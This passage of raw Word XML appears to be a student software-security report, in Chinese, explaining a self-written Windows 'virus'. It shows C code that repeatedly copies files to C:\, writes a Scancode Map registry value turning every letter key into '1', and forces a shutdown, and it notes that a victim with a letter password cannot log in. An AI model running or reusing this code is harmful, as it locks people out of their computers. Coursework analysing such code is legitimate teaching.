      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块与文件复制的原理相同，代码种定义了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>ile[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储复制路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>:\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，选择这个的原因主要是，受到攻击的主机很容易存在这个路径，容易验证复制结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A3A728" w14:textId="79EB03EA" w:rsidR="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="00A304F4">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制后的截图如图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p w14:paraId="760342B9" w14:textId="4802218B" w:rsidR="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="00A304F4">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "C:\\Users\\Lenovo\\Documents\\Tencent Files\\861218785\\Image\\C2C\\)${ROZS~`UNDE_`YQWPOF5J.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:instrText>INCLUDEPICTURE  "C:\\Users\\Lenovo\\Desktop\\2020spring\\SoftwareSecur</w:instrText>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:instrText>ity\\Documents\\Tencent Files\\861218785\\Image\\C2C\\)${ROZS~`UNDE_`YQWPOF5J.png" \* MERGEFORMATINET</w:instrText>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DA6D93">
        <w:pict w14:anchorId="4EBA80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7.5pt;height:295.5pt">
            <v:imagedata r:id="rId8" r:href="rId9"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CD9CF4" w14:textId="0104CDEB" w:rsidR="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="00A304F4">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC6BCB1" w14:textId="24155092" w:rsidR="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304F4">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来给出修改注册表来屏蔽键盘输入的代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3332D425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gKeyBoardForbidden()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4001574C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E7EDFDF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304F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HKEY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key;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345F18A6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304F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cancodemap[] =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0\x00\x00\x00\x00\x00\x00\x00\x1A\x00\x00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415958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0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0D51EB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1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0C931E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2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74AB35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3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D8EAC4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4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B34B3A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5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59CABC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6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35FE5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7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2A69E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8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FEA761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9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6825FA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E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85DDAE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F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9651C6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20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CBF29F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21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7817F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22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9FC6C5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23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99410C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24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6115CA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25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8DDB92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26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D4D2D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2C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F688B7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2D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E7DEB9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2E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583DFD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2F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4F0A7E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30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528015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31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08664B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32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491BB8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0\x00\x00\x00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B93ED4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CreateKey(HKEY_LOCAL_MACHINE,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\\CurrentControlSet\\Control\\Keyboard Layout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hkey);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AC34D0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SetValueEx(hkey, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A304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cancode Map"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0, REG_BINARY, (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A304F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BYTE</w:t>
      </w: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scancodemap, 120);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E72FBAF" w14:textId="77777777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CloseKey(hkey);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2E469B" w14:textId="1B6E161A" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304F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304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DBA4669" w14:textId="1A9307BC" w:rsidR="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304F4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个模块也是我在搜寻资料时候查到的一个模块，我之前也曾听说过这种病毒。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5F6D4C" w14:textId="2A6F4B27" w:rsidR="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段代码</w:t>
      </w:r>
      <w:r w:rsidR="0020121C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的目的就是，构造键盘映射然后调用</w:t>
      </w:r>
      <w:r w:rsidR="0020121C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidR="0020121C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改注册表的</w:t>
      </w:r>
      <w:r w:rsidR="0020121C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r w:rsidR="0020121C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，来实现对注册表</w:t>
      </w:r>
      <w:r w:rsidR="0020121C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Keyboard</w:t>
      </w:r>
      <w:r w:rsidR="0020121C">
        <w:t xml:space="preserve"> L</w:t>
      </w:r>
      <w:r w:rsidR="0020121C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayout</w:t>
      </w:r>
      <w:r w:rsidR="0020121C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的修改（添加了一个键盘映射）等重启之后就会按照映射进行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA2D822" w14:textId="04E4D636" w:rsidR="0020121C" w:rsidRDefault="0020121C" w:rsidP="00A304F4">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "C:\\Users\\Lenovo\\Documents\\Tencent Files\\861218785\\Image\\C2C\\{GKF~S{}WBOA4IRXL@0KP{8.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:instrText>INCLUDEPICTURE  "C:\\Users\\Lenovo\\Desktop\\2020spring\\SoftwareSecurity\\Documents\\Tencent Files\\861218785\\Image\\C2C</w:instrText>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:instrText>\\{GKF~S{}WBOA4IRXL@0KP{8.png" \* MERGEFORMATINET</w:instrText>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DA6D93">
        <w:pict w14:anchorId="502CA332">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" alt="" style="width:392.25pt;height:308.25pt">
            <v:imagedata r:id="rId10" r:href="rId11"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FA7CE1" w14:textId="63DC9F96" w:rsidR="0020121C" w:rsidRDefault="0020121C" w:rsidP="00A304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 w:rsidR="006C52C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A6C56E" w14:textId="77777777" w:rsidR="0020121C" w:rsidRDefault="0020121C" w:rsidP="005C26AF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Scancode Map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是注册表中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C4DC6" w14:textId="191BFC32" w:rsidR="0020121C" w:rsidRDefault="0020121C" w:rsidP="005C26AF">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[HKEY_LOCAL_MacHINE\SYSTEM\CurrentControlSet\Control\Keyboard </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Layout]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的一个二进制键值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认没有，需新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并且有固定的格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DE8F12" w14:textId="77777777" w:rsidR="0020121C" w:rsidRDefault="0020121C" w:rsidP="005C26AF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Scancode Map </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码的一般格式是：“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hex:00,00,00,00,00,00,00,00,|02|,00,00,00,|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7168D3C2" w14:textId="692F25CD" w:rsidR="0020121C" w:rsidRDefault="0020121C" w:rsidP="0020121C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>映射之后的扫描码（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XX XX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原扫描码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(XX XX)|00,00,00,00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DCD155" w14:textId="77777777" w:rsidR="0020121C" w:rsidRDefault="0020121C" w:rsidP="0020121C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前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00(DWord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是版本号和头部字节，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49575171" w14:textId="77777777" w:rsidR="0020121C" w:rsidRDefault="0020121C" w:rsidP="005C26AF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来的“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”表示映射数，其最小为值为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，表示只映射一组（这里的数值是映射数目加上末尾用作结尾的“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，因此总是比实际的映射数目大一），若要映射多组，只需增加相应的值即可，如映射</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组其值应为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DC324B" w14:textId="77777777" w:rsidR="0020121C" w:rsidRDefault="0020121C" w:rsidP="005C26AF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后边代码每</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个是一组：前两个是映射后键位的扫描码，后两个是键位原扫描码。如果要交换两个键，则一个有两组映射，四个值的排列形式是：键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>——它表示：键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成为键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成为键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50CA1FC9" w14:textId="3A0AD666" w:rsidR="0020121C" w:rsidRDefault="0020121C" w:rsidP="0020121C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后以“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>00,00,00,00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结尾。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCFCF5C" w14:textId="69332B94" w:rsidR="0053174E" w:rsidRDefault="0053174E" w:rsidP="005C26AF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和上文可知，代码修改的是：</w:t>
      </w:r>
      <w:r w:rsidR="005C26AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声明了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>~z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字母都修改为</w:t>
      </w:r>
      <w:r w:rsidR="005C26AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005C26AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="005C26AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="005C26AF">
        <w:t>cancode Map</w:t>
      </w:r>
      <w:r w:rsidR="005C26AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后调用</w:t>
      </w:r>
      <w:r w:rsidR="005C26AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidR="005C26AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的注册表</w:t>
      </w:r>
      <w:r w:rsidR="005C26AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r w:rsidR="005C26AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1BAF98" w14:textId="483DDAF5" w:rsidR="005C26AF" w:rsidRDefault="006C52C0" w:rsidP="0020121C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "C:\\Users\\Lenovo\\Documents\\Tencent Files\\861218785\\Image\\C2C\\0M)CRSIV21Q[IZU_2DX4B66.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:instrText>INCLUDEPICTURE  "C:\\Users\\Lenovo\\Desktop\\2020spring\\SoftwareSecurity\\Documents\\Tencent Files\\861218785\\Image\\C2C\\0M)CRSIV21Q[IZU_2DX4B66.png" \* MERGEFORMATINET</w:instrText>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DA6D93">
        <w:pict w14:anchorId="27605DFA">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" alt="" style="width:354pt;height:214.5pt">
            <v:imagedata r:id="rId12" r:href="rId13"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00A80A91">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0805B5A9" w14:textId="2476BAED" w:rsidR="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="002012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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EDE4EB" w14:textId="1AC4EB92" w:rsidR="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52C0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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示，重启后打开记事本，键盘上只有数字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这其实是很麻烦的一件事情，如果你的电脑有输入密码且恰巧密码里有英文，讲无法打开系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C17F266" w14:textId="0F8DFFA8" w:rsidR="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="0020121C"/>
    <w:p w14:paraId="55958BAC" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="0020121C"/>
    <w:p w14:paraId="3ED83A67" w14:textId="7CC3BF27" w:rsidR="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="0020121C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后给出系统关机模块的代码，它和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数放在一起。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC3071" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRPr="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52C0">
      <w:pPr>
        <w:pStyle w:val="alt"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 w:rsidRPr="006C52C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C52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in(){  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADB5AE9" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRPr="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52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52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KeyBoardForbidden();  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3B59CA" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRPr="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52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52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leep(3000);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF05641" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRPr="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52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52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52C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52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;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E29B41C" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRPr="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52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52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52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52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0; i &lt; 15; i++) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EF6E5C" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRPr="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52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52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pyfile();  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C69B79B" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRPr="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52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52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leep(1000);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB59CA2" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRPr="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52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52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846DF32" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRPr="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52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52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6C52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hutdown -s -t 60"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C52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ED7407" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRPr="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52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52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6C52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r computer will be shut down in 60s."</w:t>
      </w:r>
      <w:r w:rsidRPr="006C52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D891BEB" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRPr="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52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52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6C52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C52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3000C503" w14:textId="77777777" w:rsidR="006C52C0" w:rsidRPr="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52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52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263CFFF" w14:textId="077AD4C0" w:rsidR="006C52C0" w:rsidRDefault="006C52C0" w:rsidP="006C52C0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>opyfile() 15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
